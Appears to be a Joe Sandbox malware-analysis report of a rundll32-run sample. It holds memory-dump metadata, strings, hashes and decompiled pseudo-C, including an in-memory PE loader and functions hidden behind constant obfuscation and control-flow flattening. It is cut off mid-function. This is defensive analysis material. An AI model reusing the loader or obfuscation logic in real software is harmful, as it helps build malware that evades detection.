0x00b34cc3
0x00b34ccf
0x00b34cd2
0x00b34cd6
0x00b34cde
0x00b34ce6
0x00b34cf7
0x00b34d02
0x00b34d06
0x00b34d0e
0x00b34d16
0x00b34d1e
0x00b34d26
0x00b34d2e
0x00b34d36
0x00b34d3e
0x00b34d46
0x00b34d4e
0x00b34d56
0x00b34d5e
0x00b34d66
0x00b34d6e
0x00b34d76
0x00b34d7e
0x00b34d8b
0x00b34d8f
0x00b34d97
0x00b34d9f
0x00b34da7
0x00b34db2
0x00b34db6
0x00b34dba
0x00b34dc2
0x00b34dc2
0x00b34dca
0x00b34dca
0x00b34dca
0x00b34dca
0x00b34dcc
0x00000000
0x00000000
0x00b34dd2
0x00b34e98
0x00b34ea0
0x00b34ea5
0x00b34ea5
0x00b34ea5
0x00b34ead
0x00b34eb2
0x00b34ebc
0x00b34ebc
0x00000000
0x00b34ebc
0x00b34dde
0x00b34e69
0x00b34e6a
0x00b34e70
0x00b34e75
0x00b34e7c
0x00b34e7e
0x00000000
0x00000000
0x00b34e84
0x00b34e8e
0x00000000
0x00b34e8e
0x00b34de6
0x00b34e4e
0x00b34e53
0x00000000
0x00b34e53
0x00b34dee
0x00b34e2c
0x00b34e34
0x00b34e39
0x00b34e41
0x00000000
0x00b34e41
0x00b34df2
0x00000000
0x00000000
0x00b34df8
0x00b34df9
0x00b34e15
0x00b34e1a
0x00b34e1d
0x00b34e26
0x00b34e27
0x00b34e27
0x00b34ec3
0x00b34ec9
0x00b34f39
0x00b34f4b
0x00b34f50
0x00b34f56
0x00b34f59
0x00b34f5f
0x00000000
0x00b34f5f
0x00b34ecb
0x00b34ed1
0x00b34f25
0x00000000
0x00b34f2a
0x00b34ed3
0x00b34ed9
0x00000000
0x00000000
0x00b34eef
0x00b34ef4
0x00b34ef6
0x00b34ef9
0x00b34efb
0x00b34f15
0x00b34efd
0x00b34efd
0x00b34f05
0x00b34f0b
0x00b34f0b
0x00000000
0x00b34f64
0x00b34f64
0x00b34f64
0x00b34f71
0x00b34f7c

Strings

`=6, xrefs: 00B34E34
j, xrefs: 00B34F5F
X, xrefs: 00B34D6E
!yG, xrefs: 00B34C79
j, xrefs: 00B34F64
`=6, xrefs: 00B34ECB
o9, xrefs: 00B34D7E
,, xrefs: 00B34E2C
, xrefs: 00B34CBB
Q, xrefs: 00B34BB5
8b, xrefs: 00B34BF4
x0, xrefs: 00B34D9F

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
API String ID: 0-3958274775
Opcode ID: 7c6bc8941d567a7470025aa77c0caa178deb2134541045b1a3b9658a2e1f6ffe
Instruction ID: b57f139d221e371faab1821db3ba29bb1dac9fce5cff48f95eb61146dc49fb79
Opcode Fuzzy Hash: 7c6bc8941d567a7470025aa77c0caa178deb2134541045b1a3b9658a2e1f6ffe
Instruction Fuzzy Hash: 81A155711083819FD358CF64D58A42BFBE1FBC4358F204A2DF1969A2A0D7B99A49CF46

Uniqueness

Uniqueness Score: -1.00%

Function 1000288D, Relevance: 15.2, APIs: 10, Instructions: 209
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E1000288D(intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v44;
				char _v48;
				void* _t75;
				void* _t81;
				long _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				intOrPtr _t103;
				void* _t105;
				signed int _t110;
				void* _t113;
				void* _t116;
				intOrPtr* _t119;
				void* _t123;
				intOrPtr _t131;
				void* _t133;
				signed int _t135;
				intOrPtr* _t137;
				intOrPtr* _t138;
				signed int _t139;
				long _t142;
				long _t143;
				void* _t145;

				_v8 = _v8 & 0x00000000;
				_t144 = __ecx;
				_v12 = __ecx;
				if(E100023BA(_a8, 0x40) == 0) {
					L35:
					return 0;
				}
				_t138 = _a4;
				if( *_t138 != 0x5a4d) {
					L33:
					_push(0xc1);
					L34:
					SetLastError();
					goto L35;
				}
				if(E100023BA(_a8,  *((intOrPtr*)(_t138 + 0x3c)) + 0xf8) == 0) {
					goto L35;
				}
				_t119 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
				if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 4)) != 0x14c || ( *(_t119 + 0x38) & 0x00000001) != 0) {
					goto L33;
				} else {
					_t139 =  *(_t119 + 6) & 0x0000ffff;
					_t75 = ( *(_t119 + 0x14) & 0x0000ffff) + 0x24;
					if(_t139 == 0) {
						L10:
						_push( &_v48); // executed
						L10002CBC(); // executed
						_t122 = _v44;
						_t25 = _t122 - 1; // -1
						_t26 = _t122 - 1; // -1
						_t135 =  !_t25;
						_t142 = _t26 +  *((intOrPtr*)(_t119 + 0x50)) & _t135;
						if(_t142 != (_v8 - 0x00000001 + _v44 & _t135)) {
							goto L33;
						}
						_t81 = VirtualAlloc( *(_t119 + 0x34), _t142, 0x3000, 4); // executed
						_v8 = _t81;
						if(_t81 != 0) {
							L14:
							_t83 = HeapAlloc(GetProcessHeap(), 8, 0x34);
							_t123 = _v8;
							_t143 = _t83;
							if(_t143 != 0) {
								 *(_t143 + 4) = _t123;
								 *(_t143 + 0x14) = ( *(_t119 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
								 *((intOrPtr*)(_t143 + 0x1c)) = _a12;
								 *((intOrPtr*)(_t143 + 0x20)) = _a16;
								 *((intOrPtr*)(_t143 + 0x24)) = _a20;
								 *((intOrPtr*)(_t143 + 0x28)) = _a24;
								 *((intOrPtr*)(_t143 + 0x30)) = _v44;
								if(E100023BA(_a8,  *(_t119 + 0x54)) == 0) {
									L28:
									E100026C0(_t143);
									goto L35;
								}
								_t94 = VirtualAlloc(_v8,  *(_t119 + 0x54), 0x1000, 4); // executed
								_t145 = _t94;
								E10002C22(_t145, _a4,  *(_t119 + 0x54));
								_t97 =  *((intOrPtr*)(_a4 + 0x3c)) + _t145;
								_t144 = _v12;
								 *_t143 = _t97;
								 *((intOrPtr*)(_t97 + 0x34)) = _v8;
								_t98 = E100023D8(_v12, _a4, _a8, _t119, _t143); // executed
								if(_t98 == 0) {
									goto L28;
								}
								_t101 =  *((intOrPtr*)( *_t143 + 0x34)) ==  *(_t119 + 0x34);
								if( *((intOrPtr*)( *_t143 + 0x34)) ==  *(_t119 + 0x34)) {
									_t103 = 1;
								} else {
									_t103 = E10002B68(_t144, _t143, _t101);
								}
								 *((intOrPtr*)(_t143 + 0x18)) = _t103;
								if(E1000225B(_t143) != 0) {
									_t105 = E10002591(_t144, _t143); // executed
									if(_t105 != 0 && E100024BD(_t143) != 0) {
										_t131 =  *((intOrPtr*)( *_t143 + 0x28));
										if(_t131 == 0) {
											 *(_t143 + 0x2c) =  *(_t143 + 0x2c) & 0x00000000;
											L32:
											return _t143;
										}
										_t110 = _v8 + _t131;
										if( *(_t143 + 0x14) == 0) {
											 *(_t143 + 0x2c) = _t110;
											goto L32;
										}
										_push(0);
										_push(1);
										_push(0x10000000);
										if( *_t110() != 0) {
											 *((intOrPtr*)(_t143 + 0x10)) = 1;
											goto L32;
										}
										SetLastError(0x45a);
									}
								}
								goto L28;
							}
							VirtualFree(_t123, _t83, 0x8000);
							L13:
							_push(0xe);
							goto L34;
						}
						_t113 = VirtualAlloc(_t81, _t142, 0x3000, 4); // executed
						_v8 = _t113;
						if(_t113 != 0) {
							goto L14;
						}
						goto L13;
					}
					_t133 = _v8;
					_t137 = _t75 + _t119;
					do {
						_t115 =  !=  ?  *((void*)(_t137 + 4)) :  *(_t119 + 0x38);
						_t116 = ( !=  ?  *((void*)(_t137 + 4)) :  *(_t119 + 0x38)) +  *_t137;
						_t137 = _t137 + 0x28;
						_t117 =  <=  ? _t133 : _t116;
						_t133 =  <=  ? _t133 : _t116;
						_t139 = _t139 - 1;
					} while (_t139 != 0);
					_v8 = _t133;
					goto L10;
				}
			}

0x10002893
0x1000289f
0x100028a1
0x100028ab
0x10002ae5
0x00000000
0x10002ae5
0x100028b1
0x100028bc
0x10002ada
0x10002ada
0x10002adf
0x10002adf
0x00000000
0x10002adf
0x100028d7
0x00000000
0x00000000
0x100028e0
0x100028e8
0x00000000
0x10002907
0x1000290b
0x1000290f
0x10002914
0x1000293b
0x1000293e
0x1000293f
0x10002944
0x1000294d
0x10002950
0x10002953
0x1000295a
0x1000295e
0x00000000
0x00000000
0x1000296f
0x10002975
0x1000297a
0x10002999
0x100029a4
0x100029aa
0x100029ad
0x100029b1
0x100029c2
0x100029d1
0x100029d7
0x100029dd
0x100029e3
0x100029e9
0x100029ef
0x100029ff
0x10002aba
0x10002abd
0x00000000
0x10002abd
0x10002a12
0x10002a1b
0x10002a21
0x10002a33
0x10002a35
0x10002a3c
0x10002a3e
0x10002a44
0x10002a4b
0x00000000
0x00000000
0x10002a52
0x10002a55
0x10002a64
0x10002a57
0x10002a5b
0x10002a5b
0x10002a68
0x10002a72
0x10002a77
0x10002a7e
0x10002a8e
0x10002a93
0x10002ad2
0x10002ad6
0x00000000
0x10002ad6
0x10002a98
0x10002a9e
0x10002acd
0x00000000
0x10002acd
0x10002aa0
0x10002aa2
0x10002aa4
0x10002aad
0x10002ac4
0x00000000
0x10002ac4
0x10002ab4
0x10002ab4
0x10002a7e
0x00000000
0x10002a72
0x100029ba
0x10002992
0x10002992
0x00000000
0x10002992
0x10002985
0x1000298b
0x10002990
0x00000000
0x00000000
0x00000000
0x10002990
0x10002916
0x10002919
0x1000291c
0x10002923
0x10002927
0x10002929
0x1000292e
0x10002931
0x10002933
0x10002933
0x10002938
0x00000000
0x10002938

APIs

Part of subcall function 100023BA: SetLastError.KERNEL32(0000000D,?,100028A9,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49,10002B3B,00000000), ref: 100023C7

GetNativeSystemInfo.KERNEL32(10002857), ref: 1000293F
VirtualAlloc.KERNELBASE(?,?,00003000,00000004,10002159,?,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49), ref: 1000296F
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,10002159,00000000), ref: 10002985
GetProcessHeap.KERNEL32(00000008,00000034,?,10002159,00000000), ref: 1000299D
HeapAlloc.KERNEL32(00000000,?,10002159,00000000), ref: 100029A4
VirtualFree.KERNEL32(00000000,00000000,00008000,?,10002159,00000000), ref: 100029BA
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,10002159,?,?,10002159,00000000), ref: 10002A12
und_memcpy.LIBVCRUNTIME ref: 10002A21
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,10002159,00000000), ref: 10002AB4

Part of subcall function 100026C0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,10002AC2,00000000,10002159,?,?,10002159,00000000), ref: 10002726
Part of subcall function 100026C0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,10002AC2,00000000,10002159,?,?,10002159,00000000), ref: 1000272E
Part of subcall function 100026C0: HeapFree.KERNEL32(00000000,?,10002AC2), ref: 10002735

SetLastError.KERNEL32(000000C1,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49,10002B3B,00000000,?,10002159,00000000), ref: 10002ADF

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$AllocHeap$ErrorFreeLast$Process$InfoNativeSystemund_memcpy
String ID:
API String ID: 4093005746-0
Opcode ID: 0ab2a250ca3eac1d39a73b9ac0c12bbbcad5e6a5782c7eb362b19a931988e4eb
Instruction ID: d3499257f24b97b58dc88dd86fbd14561d56403c03c55b35f455527c3641d1ca
Opcode Fuzzy Hash: 0ab2a250ca3eac1d39a73b9ac0c12bbbcad5e6a5782c7eb362b19a931988e4eb
Instruction Fuzzy Hash: 4A71AA71700206AFEB15CF68CD80B59BBF5FF49784F118018E905DB68ADB74EA90CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00B33895, Relevance: 12.8, Strings: 10, Instructions: 274
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00B33895() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t281;
				intOrPtr _t284;
				void* _t286;
				void* _t290;
				void* _t294;
				void* _t295;
				char _t297;
				void* _t303;
				intOrPtr _t321;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int* _t331;

				_t331 =  &_v700;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t295 = 0x16120aa4;
				_v536 = 0x65127b;
				_v664 = 0x3b49;
				_v664 = _v664 << 5;
				_v664 = _v664 + 0x6a36;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x00000fa7;
				_v616 = 0x772f;
				_v616 = _v616 ^ 0x73b15b69;
				_v616 = _v616 ^ 0x73b12d46;
				_v604 = 0xe6c8;
				_v604 = _v604 + 0x8155;
				_v604 = _v604 ^ 0x000105e4;
				_v700 = 0xa5d;
				_v700 = _v700 * 0x52;
				_t294 = 0;
				_v700 = _v700 + 0xffffecf8;
				_t325 = 0x58;
				_v700 = _v700 * 0x66;
				_v700 = _v700 ^ 0x014b32de;
				_v684 = 0xc8e0;
				_v684 = _v684 + 0x308b;
				_v684 = _v684 + 0x2664;
				_v684 = _v684 >> 6;
				_v684 = _v684 ^ 0x00006abe;
				_v676 = 0x796a;
				_v676 = _v676 + 0xffff196c;
				_v676 = _v676 + 0xffffd40e;
				_v676 = _v676 ^ 0xd773f48b;
				_v676 = _v676 ^ 0x288ceae9;
				_v612 = 0x157c;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0x157c11c9;
				_v652 = 0xe7a2;
				_v652 = _v652 / _t325;
				_v652 = _v652 | 0x448e2e0d;
				_v652 = _v652 ^ 0x448e7eb8;
				_v640 = 0x3ee9;
				_v640 = _v640 * 0x5d;
				_v640 = _v640 >> 0xd;
				_v640 = _v640 ^ 0x0000282d;
				_v648 = 0xf425;
				_v648 = _v648 * 9;
				_v648 = _v648 >> 1;
				_v648 = _v648 ^ 0x0004354a;
				_v608 = 0x24ee;
				_v608 = _v608 + 0x809c;
				_v608 = _v608 ^ 0x0000fdeb;
				_v636 = 0x6dae;
				_v636 = _v636 + 0x1c44;
				_v636 = _v636 + 0x2b83;
				_v636 = _v636 ^ 0x0000a12d;
				_v656 = 0xe590;
				_v656 = _v656 >> 2;
				_v656 = _v656 << 7;
				_v656 = _v656 ^ 0x001cffcc;
				_v668 = 0xb9db;
				_v668 = _v668 >> 0xd;
				_v668 = _v668 + 0x89dd;
				_v668 = _v668 | 0xbce2fd3c;
				_v668 = _v668 ^ 0xbce2f9c6;
				_v596 = 0x1790;
				_v596 = _v596 + 0xffff27ec;
				_v596 = _v596 ^ 0xffff59a3;
				_v672 = 0xffb9;
				_v672 = _v672 + 0xffff618d;
				_v672 = _v672 >> 2;
				_t326 = 0x31;
				_v672 = _v672 * 0x75;
				_v672 = _v672 ^ 0x000b38e4;
				_v644 = 0xc4de;
				_v644 = _v644 + 0xbfb6;
				_v644 = _v644 ^ 0xc1434f22;
				_v644 = _v644 ^ 0xc142a5f5;
				_v680 = 0x8a5a;
				_v680 = _v680 | 0x8f6cf4f7;
				_v680 = _v680 + 0x838e;
				_v680 = _v680 + 0xffffa8f9;
				_v680 = _v680 ^ 0x8f6d4033;
				_v660 = 0xe8e2;
				_v660 = _v660 / _t326;
				_t327 = 0x25;
				_v660 = _v660 * 0x78;
				_v660 = _v660 ^ 0x000205be;
				_v688 = 0x9cd0;
				_v688 = _v688 + 0x8e7d;
				_v688 = _v688 * 0x26;
				_v688 = _v688 * 0x51;
				_v688 = _v688 ^ 0x0e0ecd55;
				_v620 = 0xe1b5;
				_v620 = _v620 / _t327;
				_v620 = _v620 ^ 0x00005557;
				_v696 = 0x769d;
				_v696 = _v696 >> 7;
				_v696 = _v696 | 0x5538ae99;
				_v696 = _v696 << 2;
				_v696 = _v696 ^ 0x54e2b31f;
				_v600 = 0xdcef;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x003705ca;
				_v624 = 0x48eb;
				_v624 = _v624 >> 0xd;
				_v624 = _v624 ^ 0x00002379;
				_v692 = 0xfa2c;
				_v692 = _v692 | 0x4759ecfd;
				_v692 = _v692 >> 0xc;
				_v692 = _v692 >> 9;
				_v692 = _v692 ^ 0x000062c4;
				_v632 = 0xbcd9;
				_v632 = _v632 << 4;
				_v632 = _v632 | 0x68c1d353;
				_v632 = _v632 ^ 0x68cbf855;
				_v628 = 0x848;
				_t328 = 0x1c;
				_v628 = _v628 / _t328;
				_v628 = _v628 ^ 0x00001dd4;
				_t324 = _v628;
				_v592 = 0xa720;
				_v592 = _v592 + 0xffff9569;
				_v592 = _v592 ^ 0x00003c8a;
				do {
					while(_t295 != 0x2b0230e) {
						if(_t295 == 0x16120aa4) {
							_t295 = 0x182cddf3;
							continue;
						} else {
							if(_t295 == 0x182cddf3) {
								E00B3AAAE(_v604, _v700, _v684,  &_v588, _v676);
								_t331 =  &(_t331[3]);
								_t295 = 0x2f4d7b3a;
								continue;
							} else {
								if(_t295 == 0x1c4d16fa) {
									_t284 = _v584;
									_t297 = _v588;
									_v548 = _v548 & 0x00000000;
									_v576 = _t284;
									_v568 = _t284;
									_v560 = _t284;
									_v552 = _t284;
									_v580 = _t297;
									_v572 = _t297;
									_v564 = _t297;
									_v556 = _t297;
									_t286 = E00B2B6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
									_t331 =  &(_t331[5]);
									__eflags = _t286;
									_t294 =  !=  ? 1 : _t294;
									_t295 = 0x2a39a402;
									continue;
								} else {
									if(_t295 == 0x2a39a402) {
										E00B34F7D(_v632, _v628, _t324);
									} else {
										if(_t295 == 0x2f4d7b3a) {
											_v588 = _v588 - E00B2F46D();
											_t295 = 0x369a1b5f;
											asm("sbb [esp+0x84], edx");
											continue;
										} else {
											_t339 = _t295 - 0x369a1b5f;
											if(_t295 != 0x369a1b5f) {
												goto L16;
											} else {
												_push(_v652);
												_t290 = E00B3889D(0xb3c9b0, _v612, _t339);
												_pop(_t303);
												_t321 =  *0xb3ca2c; // 0x505cc8
												_t224 = _t321 + 0x230; // 0x6c0053
												E00B2C680(_t224, _v648, _v608, _t303, _v636,  *0xb3ca2c, _t290,  &_v524);
												_t331 =  &(_t331[7]);
												E00B32025(_v656, _t290, _v668, _v596);
												_t295 = 0x2b0230e;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t294;
					}
					_t281 = E00B2B566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
					_t324 = _t281;
					_t331 =  &(_t331[0xc]);
					__eflags = _t281 - 0xffffffff;
					if(__eflags == 0) {
						_t295 = 0x1d984ba2;
						goto L16;
					} else {
						_t295 = 0x1c4d16fa;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t295 - 0x1d984ba2;
				} while (__eflags != 0);
				goto L19;
			}

0x00b33895
0x00b3389b
0x00b338a5
0x00b338ad
0x00b338b2
0x00b338bd
0x00b338c5
0x00b338ca
0x00b338d2
0x00b338d7
0x00b338df
0x00b338e7
0x00b338ef
0x00b338f7
0x00b338ff
0x00b33907
0x00b3390f
0x00b3391e
0x00b33922
0x00b33924
0x00b33933
0x00b33934
0x00b33938
0x00b33940
0x00b33948
0x00b33950
0x00b33958
0x00b3395d
0x00b33965
0x00b3396d
0x00b33975
0x00b3397d
0x00b33985
0x00b3398d
0x00b33995
0x00b3399a
0x00b339a2
0x00b339b0
0x00b339b4
0x00b339bc
0x00b339c4
0x00b339d1
0x00b339d5
0x00b339da
0x00b339e2
0x00b339ef
0x00b339f3
0x00b339f7
0x00b339ff
0x00b33a07
0x00b33a0f
0x00b33a17
0x00b33a1f
0x00b33a27
0x00b33a2f
0x00b33a37
0x00b33a3f
0x00b33a44
0x00b33a49
0x00b33a51
0x00b33a59
0x00b33a5e
0x00b33a66
0x00b33a6e
0x00b33a76
0x00b33a7e
0x00b33a86
0x00b33a8e
0x00b33a96
0x00b33a9e
0x00b33aac
0x00b33ab4
0x00b33ab8
0x00b33ac0
0x00b33ac8
0x00b33ad0
0x00b33ad8
0x00b33ae0
0x00b33ae8
0x00b33af0
0x00b33af8
0x00b33b00
0x00b33b08
0x00b33b18
0x00b33b21
0x00b33b24
0x00b33b28
0x00b33b30
0x00b33b38
0x00b33b45
0x00b33b4e
0x00b33b52
0x00b33b5a
0x00b33b6a
0x00b33b6e
0x00b33b76
0x00b33b7e
0x00b33b83
0x00b33b8b
0x00b33b90
0x00b33b98
0x00b33ba0
0x00b33ba5
0x00b33bad
0x00b33bb5
0x00b33bba
0x00b33bc2
0x00b33bca
0x00b33bd2
0x00b33bd7
0x00b33bdc
0x00b33be4
0x00b33bec
0x00b33bf1
0x00b33bf9
0x00b33c01
0x00b33c0d
0x00b33c10
0x00b33c14
0x00b33c1c
0x00b33c20
0x00b33c28
0x00b33c30
0x00b33c38
0x00b33c38
0x00b33c4a
0x00b33db7
0x00000000
0x00b33c50
0x00b33c52
0x00b33da5
0x00b33daa
0x00b33dad
0x00000000
0x00b33c58
0x00b33c5e
0x00b33d0c
0x00b33d17
0x00b33d1e
0x00b33d26
0x00b33d2d
0x00b33d34
0x00b33d3b
0x00b33d57
0x00b33d5e
0x00b33d65
0x00b33d6c
0x00b33d73
0x00b33d7a
0x00b33d7e
0x00b33d80
0x00b33d83
0x00000000
0x00b33c64
0x00b33c6a
0x00b33e2c
0x00b33c70
0x00b33c76
0x00b33cf4
0x00b33cfb
0x00b33d00
0x00000000
0x00b33c78
0x00b33c78
0x00b33c7e
0x00000000
0x00b33c84
0x00b33c84
0x00b33c91
0x00b33c96
0x00b33cb8
0x00b33cc2
0x00b33cc8
0x00b33ccd
0x00b33cde
0x00b33ce5
0x00000000
0x00b33ce5
0x00b33c7e
0x00b33c76
0x00b33c6a
0x00b33c5e
0x00b33c52
0x00b33e35
0x00b33e3e
0x00b33e3e
0x00b33df7
0x00b33dfc
0x00b33dfe
0x00b33e01
0x00b33e04
0x00b33e10
0x00000000
0x00b33e06
0x00b33e06
0x00000000
0x00b33e06
0x00000000
0x00b33e15
0x00b33e15
0x00b33e15
0x00000000

Strings

:{M/, xrefs: 00B33C70
d&, xrefs: 00B33950
y#, xrefs: 00B33BBA
6j, xrefs: 00B338CA
-(, xrefs: 00B339DA
jy, xrefs: 00B33965
$, xrefs: 00B339FF
:{M/, xrefs: 00B33DAD
WU, xrefs: 00B33B6E
/w, xrefs: 00B338DF

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: -($/w$6j$:{M/$:{M/$WU$d&$jy$y#$$
API String ID: 2962429428-1089002639
Opcode ID: 24c79f618e6ab681e80eec5213ef63b77ca12f5d78b4cbe0fbe92730c12ff7c6
Instruction ID: 2810e11bfad47a460d3560ea00b258e66fd88c520673c4a6ffc47d579f27e1cf
Opcode Fuzzy Hash: 24c79f618e6ab681e80eec5213ef63b77ca12f5d78b4cbe0fbe92730c12ff7c6
Instruction Fuzzy Hash: EAD100715083809FE368CF65C489A5BBBE1FBC4758F208A1DF1D9862A0D7B98949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B342DA, Relevance: 7.9, Strings: 6, Instructions: 373
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00B342DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t336;
				intOrPtr _t357;
				intOrPtr _t361;
				void* _t365;
				signed int _t368;
				intOrPtr _t379;
				intOrPtr _t380;
				void* _t413;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				intOrPtr* _t428;
				signed int _t431;
				signed int* _t437;
				void* _t439;

				_t380 = __ecx;
				_push(_a16);
				_v148 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t336);
				_v32 = 0x4bc1;
				_t437 =  &(( &_v172)[6]);
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000002f8;
				_t379 = 0;
				_v168 = 0xbc3a;
				_t431 = 0x3b64c246;
				_v168 = _v168 >> 0xa;
				_t435 = 0;
				_v168 = _v168 << 1;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x0000918a;
				_v96 = 0x296c;
				_v96 = _v96 ^ 0xfe254c59;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x0001a08f;
				_v52 = 0x7e94;
				_v52 = _v52 + 0xffff276a;
				_v52 = _v52 ^ 0xffffb392;
				_v156 = 0x71e;
				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x91e5be42;
				_v156 = _v156 | 0xf592e812;
				_v156 = _v156 ^ 0xf5fb9c3d;
				_v60 = 0xbf5e;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x00001130;
				_v112 = 0x687f;
				_v112 = _v112 | 0xf46ca00f;
				_t421 = 0x35;
				_v112 = _v112 * 0x78;
				_v112 = _v112 ^ 0x930cd2b7;
				_v152 = 0xc857;
				_v152 = _v152 << 5;
				_v152 = _v152 | 0x37c6acdc;
				_v152 = _v152 + 0xffffd100;
				_v152 = _v152 ^ 0x37df0477;
				_v144 = 0xf477;
				_v144 = _v144 >> 2;
				_v144 = _v144 << 5;
				_v144 = _v144 | 0xf3531cc7;
				_v144 = _v144 ^ 0xf357d736;
				_v120 = 0xcb9;
				_v120 = _v120 + 0xe3f9;
				_v120 = _v120 ^ 0x6ced8dd9;
				_v120 = _v120 ^ 0x6ced4b8c;
				_v20 = 0x5e2b;
				_v20 = _v20 + 0xffff1e4f;
				_v20 = _v20 ^ 0xffff4ba5;
				_v124 = 0x4b0e;
				_v124 = _v124 / _t421;
				_t422 = 0x44;
				_v124 = _v124 / _t422;
				_v124 = _v124 ^ 0x00000f50;
				_v92 = 0x1f74;
				_v92 = _v92 + 0xffffb151;
				_v92 = _v92 ^ 0xde981c2c;
				_v92 = _v92 ^ 0x2167c13f;
				_v48 = 0x349e;
				_v48 = _v48 | 0xa536c816;
				_v48 = _v48 ^ 0xa536ef12;
				_v172 = 0xab81;
				_t423 = 0x46;
				_v172 = _v172 * 0x33;
				_v172 = _v172 + 0xffff1acb;
				_v172 = _v172 ^ 0xbb3feb59;
				_v172 = _v172 ^ 0xbb1e804f;
				_v72 = 0x6207;
				_v72 = _v72 + 0xffff8a84;
				_v72 = _v72 ^ 0xffffdea5;
				_v80 = 0xb702;
				_v80 = _v80 * 0x71;
				_v80 = _v80 + 0xffff1180;
				_v80 = _v80 ^ 0x004fd1d8;
